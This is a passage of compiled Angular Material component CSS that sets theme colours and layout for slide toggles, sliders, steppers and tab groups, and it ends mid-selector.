.mat-drawer-side.mat-drawer-end[_ngcontent-%COMP%]{border-left:none;border-right:solid 1px rgba(0,0,0,.12)}.mat-drawer-backdrop.mat-drawer-shown[_ngcontent-%COMP%]{background-color:#0009}.mat-slide-toggle.mat-checked[_ngcontent-%COMP%] .mat-slide-toggle-thumb[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-slide-toggle.mat-checked[_ngcontent-%COMP%] .mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#7b1fa28a}.mat-slide-toggle.mat-checked[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-slide-toggle.mat-primary.mat-checked[_ngcontent-%COMP%] .mat-slide-toggle-thumb[_ngcontent-%COMP%]{background-color:#2196f3}.mat-slide-toggle.mat-primary.mat-checked[_ngcontent-%COMP%] .mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#2196f38a}.mat-slide-toggle.mat-primary.mat-checked[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#2196f3}.mat-slide-toggle.mat-warn.mat-checked[_ngcontent-%COMP%] .mat-slide-toggle-thumb[_ngcontent-%COMP%]{background-color:#f44336}.mat-slide-toggle.mat-warn.mat-checked[_ngcontent-%COMP%] .mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#f443368a}.mat-slide-toggle.mat-warn.mat-checked[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#f44336}.mat-slide-toggle[_ngcontent-%COMP%]:not(.mat-checked) .mat-ripple-element[_ngcontent-%COMP%]{background-color:#000}.mat-slide-toggle-thumb[_ngcontent-%COMP%]{box-shadow:0 2px 1px -1px #0003,0 1px 1px #00000024,0 1px 3px #0000001f;background-color:#fafafa}.mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#00000061}.mat-slider-track-background[_ngcontent-%COMP%]{background-color:#00000042}.mat-slider.mat-primary[_ngcontent-%COMP%] .mat-slider-track-fill[_ngcontent-%COMP%], .mat-slider.mat-primary[_ngcontent-%COMP%] .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-primary[_ngcontent-%COMP%] .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#2196f3}.mat-slider.mat-primary[_ngcontent-%COMP%] .mat-slider-thumb-label-text[_ngcontent-%COMP%]{color:#fff}.mat-slider.mat-primary[_ngcontent-%COMP%] .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#2196f333}.mat-slider.mat-accent[_ngcontent-%COMP%] .mat-slider-track-fill[_ngcontent-%COMP%], .mat-slider.mat-accent[_ngcontent-%COMP%] .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-accent[_ngcontent-%COMP%] .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-slider.mat-accent[_ngcontent-%COMP%] .mat-slider-thumb-label-text[_ngcontent-%COMP%]{color:#fff}.mat-slider.mat-accent[_ngcontent-%COMP%] .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#7b1fa233}.mat-slider.mat-warn[_ngcontent-%COMP%] .mat-slider-track-fill[_ngcontent-%COMP%], .mat-slider.mat-warn[_ngcontent-%COMP%] .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-warn[_ngcontent-%COMP%] .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#f44336}.mat-slider.mat-warn[_ngcontent-%COMP%] .mat-slider-thumb-label-text[_ngcontent-%COMP%]{color:#fff}.mat-slider.mat-warn[_ngcontent-%COMP%] .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#f4433633}.mat-slider[_ngcontent-%COMP%]:hover .mat-slider-track-background[_ngcontent-%COMP%], .mat-slider.cdk-focused[_ngcontent-%COMP%] .mat-slider-track-background[_ngcontent-%COMP%]{background-color:#00000061}.mat-slider.mat-slider-disabled[_ngcontent-%COMP%] .mat-slider-track-background[_ngcontent-%COMP%], .mat-slider.mat-slider-disabled[_ngcontent-%COMP%] .mat-slider-track-fill[_ngcontent-%COMP%], .mat-slider.mat-slider-disabled[_ngcontent-%COMP%] .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-slider-disabled[_ngcontent-%COMP%]:hover .mat-slider-track-background[_ngcontent-%COMP%]{background-color:#00000042}.mat-slider.mat-slider-min-value[_ngcontent-%COMP%] .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#0000001f}.mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing[_ngcontent-%COMP%] .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing[_ngcontent-%COMP%] .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#000000de}.mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing.cdk-focused[_ngcontent-%COMP%] .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing.cdk-focused[_ngcontent-%COMP%] .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#00000042}.mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing) .mat-slider-thumb[_ngcontent-%COMP%]{border-color:#00000042;background-color:transparent}.mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing):hover .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing).cdk-focused .mat-slider-thumb[_ngcontent-%COMP%]{border-color:#00000061}.mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing):hover.mat-slider-disabled .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing).cdk-focused.mat-slider-disabled .mat-slider-thumb[_ngcontent-%COMP%]{border-color:#00000042}.mat-slider-has-ticks[_ngcontent-%COMP%] .mat-slider-wrapper[_ngcontent-%COMP%]:after{border-color:#000000b3}.mat-slider-horizontal[_ngcontent-%COMP%] .mat-slider-ticks[_ngcontent-%COMP%]{background-image:repeating-linear-gradient(to right,rgba(0,0,0,.7),rgba(0,0,0,.7) 2px,transparent 0,transparent);background-image:-moz-repeating-linear-gradient(.0001deg,rgba(0,0,0,.7),rgba(0,0,0,.7) 2px,transparent 0,transparent)}.mat-slider-vertical[_ngcontent-%COMP%] .mat-slider-ticks[_ngcontent-%COMP%]{background-image:repeating-linear-gradient(to bottom,rgba(0,0,0,.7),rgba(0,0,0,.7) 2px,transparent 0,transparent)}.mat-step-header.cdk-keyboard-focused[_ngcontent-%COMP%], .mat-step-header.cdk-program-focused[_ngcontent-%COMP%], .mat-step-header[_ngcontent-%COMP%]:hover:not([aria-disabled]), .mat-step-header[_ngcontent-%COMP%]:hover[aria-disabled=false]{background-color:#0000000a}.mat-step-header[_ngcontent-%COMP%]:hover[aria-disabled=true]{cursor:default}@media (hover: none){.mat-step-header[_ngcontent-%COMP%]:hover{background:none}}.mat-step-header[_ngcontent-%COMP%] .mat-step-label[_ngcontent-%COMP%], .mat-step-header[_ngcontent-%COMP%] .mat-step-optional[_ngcontent-%COMP%]{color:#0000008a}.mat-step-header[_ngcontent-%COMP%] .mat-step-icon[_ngcontent-%COMP%]{background-color:#0000008a;color:#fff}.mat-step-header[_ngcontent-%COMP%] .mat-step-icon-selected[_ngcontent-%COMP%], .mat-step-header[_ngcontent-%COMP%] .mat-step-icon-state-done[_ngcontent-%COMP%], .mat-step-header[_ngcontent-%COMP%] .mat-step-icon-state-edit[_ngcontent-%COMP%]{background-color:#2196f3;color:#fff}.mat-step-header.mat-accent[_ngcontent-%COMP%] .mat-step-icon[_ngcontent-%COMP%]{color:#fff}.mat-step-header.mat-accent[_ngcontent-%COMP%] .mat-step-icon-selected[_ngcontent-%COMP%], .mat-step-header.mat-accent[_ngcontent-%COMP%] .mat-step-icon-state-done[_ngcontent-%COMP%], .mat-step-header.mat-accent[_ngcontent-%COMP%] .mat-step-icon-state-edit[_ngcontent-%COMP%]{background-color:#7b1fa2;color:#fff}.mat-step-header.mat-warn[_ngcontent-%COMP%] .mat-step-icon[_ngcontent-%COMP%]{color:#fff}.mat-step-header.mat-warn[_ngcontent-%COMP%] .mat-step-icon-selected[_ngcontent-%COMP%], .mat-step-header.mat-warn[_ngcontent-%COMP%] .mat-step-icon-state-done[_ngcontent-%COMP%], .mat-step-header.mat-warn[_ngcontent-%COMP%] .mat-step-icon-state-edit[_ngcontent-%COMP%]{background-color:#f44336;color:#fff}.mat-step-header[_ngcontent-%COMP%] .mat-step-icon-state-error[_ngcontent-%COMP%]{background-color:transparent;color:#f44336}.mat-step-header[_ngcontent-%COMP%] .mat-step-label.mat-step-label-active[_ngcontent-%COMP%]{color:#000000de}.mat-step-header[_ngcontent-%COMP%] .mat-step-label.mat-step-label-error[_ngcontent-%COMP%]{color:#f44336}.mat-stepper-horizontal[_ngcontent-%COMP%], .mat-stepper-vertical[_ngcontent-%COMP%]{background-color:#fff}.mat-stepper-vertical-line[_ngcontent-%COMP%]:before{border-left-color:#0000001f}.mat-horizontal-stepper-header[_ngcontent-%COMP%]:before, .mat-horizontal-stepper-header[_ngcontent-%COMP%]:after, .mat-stepper-horizontal-line[_ngcontent-%COMP%]{border-top-color:#0000001f}.mat-horizontal-stepper-header[_ngcontent-%COMP%]{height:72px}.mat-stepper-label-position-bottom[_ngcontent-%COMP%] .mat-horizontal-stepper-header[_ngcontent-%COMP%], .mat-vertical-stepper-header[_ngcontent-%COMP%]{padding:24px}.mat-stepper-vertical-line[_ngcontent-%COMP%]:before{top:-16px;bottom:-16px}.mat-stepper-label-position-bottom[_ngcontent-%COMP%] .mat-horizontal-stepper-header[_ngcontent-%COMP%]:after, .mat-stepper-label-position-bottom[_ngcontent-%COMP%] .mat-horizontal-stepper-header[_ngcontent-%COMP%]:before{top:36px}.mat-stepper-label-position-bottom[_ngcontent-%COMP%] .mat-stepper-horizontal-line[_ngcontent-%COMP%]{top:36px}.mat-sort-header-arrow[_ngcontent-%COMP%]{color:#757575}.mat-tab-nav-bar[_ngcontent-%COMP%], .mat-tab-header[_ngcontent-%COMP%]{border-bottom:1px solid rgba(0,0,0,.12)}.mat-tab-group-inverted-header[_ngcontent-%COMP%] .mat-tab-nav-bar[_ngcontent-%COMP%], .mat-tab-group-inverted-header[_ngcontent-%COMP%] .mat-tab-header[_ngcontent-%COMP%]{border-top:1px solid rgba(0,0,0,.12);border-bottom:none}.mat-tab-label[_ngcontent-%COMP%], .mat-tab-link[_ngcontent-%COMP%]{color:#000000de}.mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#00000061}.mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#000000de}.mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#00000061}.mat-tab-group[class*=mat-background-][_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .mat-tab-nav-bar[class*=mat-background-][_ngcontent-%COMP%]{border-bottom:none;border-top:none}.mat-tab-group.mat-primary[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-primary[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-primary[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-primary[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#bbdefb4d}.mat-tab-group.mat-primary[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%]{background-color:#2196f3}.mat-tab-group.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-group.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%]{background-color:#fff}.mat-tab-group.mat-accent[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-accent[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-accent[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-accent[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#e1bee74d}.mat-tab-group.mat-accent[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-tab-group.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-group.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%]{background-color:#fff}.mat-tab-group.mat-warn[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-warn[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-warn[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-warn[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#ffcdd24d}.mat-tab-group.mat-warn[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%]{background-color:#f44336}.mat-tab-group.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-group.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ink-bar[_ngcontent-%COMP%]{background-color:#fff}.mat-tab-group.mat-background-primary[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#bbdefb4d}.mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]{background-color:#2196f3}.mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link[_ngcontent-%COMP%]{color:#fff}.mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#fff6}.mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before{border-color:#fff}.mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#fff;opacity:.4}.mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff;opacity:.12}.mat-tab-group.mat-background-accent[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#e1bee74d}.mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link[_ngcontent-%COMP%]{color:#fff}.mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#fff6}.mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before{border-color:#fff}.mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] 